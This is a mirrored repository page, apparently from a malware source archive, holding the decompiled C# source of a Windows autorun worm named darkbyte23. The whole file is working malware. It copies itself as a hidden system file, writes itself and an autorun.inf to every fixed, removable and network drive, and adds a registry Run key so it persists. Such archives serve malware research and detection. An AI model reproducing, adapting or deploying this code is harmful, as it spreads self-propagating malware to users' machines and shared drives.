mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-17 00:09:23 +00:00
vxunderground
287 lines
8.4 KiB
C#
287 lines
8.4 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Worm.Module1
|
|
// Assembly: darkbyte23, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: D4C3E168-4773-470D-B4A2-EE74370F5883
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.MSIL.Autorun.a-4fd1fc3790bf56c50a8859250285bd6f9f9317a2637b53234dccc40f58c7a422.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.IO;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Windows.Forms;
|
|
using Worm.My;
|
|
|
|
namespace Worm
|
|
{
|
|
[StandardModule]
|
|
internal sealed class Module1
|
|
{
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
label_0:
|
|
int num1;
|
|
int num2;
|
|
try
|
|
{
|
|
int num3 = 1;
|
|
string str1 = "";
|
|
label_1:
|
|
ProjectData.ClearProjectError();
|
|
num1 = 1;
|
|
label_2:
|
|
num3 = 3;
|
|
string contents = "[AutoRun]\r\nshellexecute=darkbyte23.exe";
|
|
label_3:
|
|
num3 = 4;
|
|
int num4 = checked (MyProject.Computer.FileSystem.Drives.Count - 1);
|
|
int index = 0;
|
|
goto label_7;
|
|
label_4:
|
|
num3 = 5;
|
|
if (Operators.CompareString(MyProject.Computer.FileSystem.Drives[index].Name, Strings.Left(MyProject.Application.Info.DirectoryPath, 3), false) != 0)
|
|
goto label_6;
|
|
label_5:
|
|
num3 = 6;
|
|
int driveType1 = (int) MyProject.Computer.FileSystem.Drives[index].DriveType;
|
|
goto label_8;
|
|
label_6:
|
|
num3 = 9;
|
|
checked { ++index; }
|
|
label_7:
|
|
if (index <= num4)
|
|
goto label_4;
|
|
label_8:
|
|
num3 = 10;
|
|
byte[] bytes = File.ReadAllBytes(Application.ExecutablePath);
|
|
label_9:
|
|
num3 = 11;
|
|
str1 = MyProject.Computer.FileSystem.SpecialDirectories.AllUsersApplicationData + "\\darkbyte23.exe";
|
|
label_10:
|
|
num3 = 12;
|
|
if (Operators.CompareString(FileSystem.Dir(str1), "", false) == 0)
|
|
goto label_12;
|
|
label_11:
|
|
num3 = 13;
|
|
File.Delete(str1);
|
|
goto label_16;
|
|
label_12:
|
|
num3 = 15;
|
|
label_13:
|
|
num3 = 16;
|
|
File.SetAttributes(str1, FileAttributes.Hidden | FileAttributes.System | FileAttributes.Normal);
|
|
label_14:
|
|
num3 = 17;
|
|
File.WriteAllBytes(str1, bytes);
|
|
label_15:
|
|
num3 = 18;
|
|
File.SetAttributes(str1, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
|
|
label_16:
|
|
num3 = 21;
|
|
int num5 = checked (MyProject.Computer.FileSystem.Drives.Count - 1);
|
|
index = 0;
|
|
goto label_28;
|
|
label_17:
|
|
num3 = 22;
|
|
if (!(MyProject.Computer.FileSystem.Drives[index].DriveType == DriveType.Network | MyProject.Computer.FileSystem.Drives[index].DriveType == DriveType.Fixed | MyProject.Computer.FileSystem.Drives[index].DriveType == DriveType.Removable & Operators.CompareString(MyProject.Computer.FileSystem.Drives[index].Name, "A:\\", false) != 0))
|
|
goto label_27;
|
|
label_18:
|
|
num3 = 23;
|
|
string str2 = MyProject.Computer.FileSystem.Drives[index].RootDirectory.ToString();
|
|
label_19:
|
|
num3 = 24;
|
|
int num6 = 7;
|
|
label_20:
|
|
num3 = 25;
|
|
string path = str2 + "darkbyte23.exe";
|
|
label_21:
|
|
num3 = 26;
|
|
File.Delete(path);
|
|
label_22:
|
|
num3 = 27;
|
|
File.WriteAllBytes(path, bytes);
|
|
label_23:
|
|
num3 = 28;
|
|
File.SetAttributes(path, (FileAttributes) num6);
|
|
label_24:
|
|
num3 = 29;
|
|
File.SetAttributes(str2 + "autorun.inf", FileAttributes.Hidden | FileAttributes.System | FileAttributes.Normal);
|
|
label_25:
|
|
num3 = 30;
|
|
File.Delete(str2 + "autorun.inf");
|
|
label_26:
|
|
num3 = 31;
|
|
File.WriteAllText(str2 + "autorun.inf", contents);
|
|
label_27:
|
|
num3 = 33;
|
|
checked { ++index; }
|
|
label_28:
|
|
if (index <= num5)
|
|
goto label_17;
|
|
label_29:
|
|
num3 = 34;
|
|
int num7 = checked (MyProject.Computer.FileSystem.Drives.Count - 1);
|
|
index = 0;
|
|
goto label_33;
|
|
label_30:
|
|
num3 = 35;
|
|
if (Operators.CompareString(MyProject.Computer.FileSystem.Drives[index].Name, Strings.Left(MyProject.Application.Info.DirectoryPath, 3), false) != 0)
|
|
goto label_32;
|
|
label_31:
|
|
num3 = 36;
|
|
int driveType2 = (int) MyProject.Computer.FileSystem.Drives[index].DriveType;
|
|
goto label_34;
|
|
label_32:
|
|
num3 = 39;
|
|
checked { ++index; }
|
|
label_33:
|
|
if (index <= num7)
|
|
goto label_30;
|
|
label_34:
|
|
num3 = 40;
|
|
if (driveType1 != driveType2)
|
|
goto label_16;
|
|
label_35:
|
|
num3 = 41;
|
|
object objectValue1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell"));
|
|
label_36:
|
|
num3 = 42;
|
|
object Instance = objectValue1;
|
|
object[] objArray = new object[2]
|
|
{
|
|
(object) "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\darkbyte23",
|
|
(object) str1
|
|
};
|
|
object[] Arguments = objArray;
|
|
bool[] flagArray = new bool[2]{ false, true };
|
|
bool[] CopyBack = flagArray;
|
|
NewLateBinding.LateCall(Instance, (System.Type) null, "regwrite", Arguments, (string[]) null, (System.Type[]) null, CopyBack, true);
|
|
if (flagArray[1])
|
|
str1 = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (string));
|
|
label_38:
|
|
num3 = 43;
|
|
object objectValue2 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Wscript.shell"));
|
|
label_39:
|
|
num3 = 44;
|
|
if (Strings.Len(MyProject.Application.Info.DirectoryPath) >= 4)
|
|
goto label_47;
|
|
label_40:
|
|
num3 = 45;
|
|
NewLateBinding.LateCall(objectValue2, (System.Type) null, "run", new object[1]
|
|
{
|
|
(object) ("explorer.exe /s, " + MyProject.Application.Info.DirectoryPath)
|
|
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
|
|
goto label_47;
|
|
label_42:
|
|
num2 = num3;
|
|
switch (num1)
|
|
{
|
|
case 1:
|
|
int num8 = num2 + 1;
|
|
num2 = 0;
|
|
switch (num8)
|
|
{
|
|
case 1:
|
|
goto label_0;
|
|
case 2:
|
|
goto label_1;
|
|
case 3:
|
|
goto label_2;
|
|
case 4:
|
|
goto label_3;
|
|
case 5:
|
|
goto label_4;
|
|
case 6:
|
|
goto label_5;
|
|
case 7:
|
|
case 10:
|
|
goto label_8;
|
|
case 8:
|
|
case 9:
|
|
goto label_6;
|
|
case 11:
|
|
goto label_9;
|
|
case 12:
|
|
goto label_10;
|
|
case 13:
|
|
goto label_11;
|
|
case 14:
|
|
case 19:
|
|
case 20:
|
|
case 21:
|
|
goto label_16;
|
|
case 15:
|
|
goto label_12;
|
|
case 16:
|
|
goto label_13;
|
|
case 17:
|
|
goto label_14;
|
|
case 18:
|
|
goto label_15;
|
|
case 22:
|
|
goto label_17;
|
|
case 23:
|
|
goto label_18;
|
|
case 24:
|
|
goto label_19;
|
|
case 25:
|
|
goto label_20;
|
|
case 26:
|
|
goto label_21;
|
|
case 27:
|
|
goto label_22;
|
|
case 28:
|
|
goto label_23;
|
|
case 29:
|
|
goto label_24;
|
|
case 30:
|
|
goto label_25;
|
|
case 31:
|
|
goto label_26;
|
|
case 32:
|
|
case 33:
|
|
goto label_27;
|
|
case 34:
|
|
goto label_29;
|
|
case 35:
|
|
goto label_30;
|
|
case 36:
|
|
goto label_31;
|
|
case 37:
|
|
case 40:
|
|
goto label_34;
|
|
case 38:
|
|
case 39:
|
|
goto label_32;
|
|
case 41:
|
|
goto label_35;
|
|
case 42:
|
|
goto label_36;
|
|
case 43:
|
|
goto label_38;
|
|
case 44:
|
|
goto label_39;
|
|
case 45:
|
|
goto label_40;
|
|
case 46:
|
|
case 47:
|
|
goto label_47;
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
goto label_42;
|
|
}
|
|
throw ProjectData.CreateProjectError(-2146828237);
|
|
label_47:
|
|
if (num2 == 0)
|
|
return;
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
}
|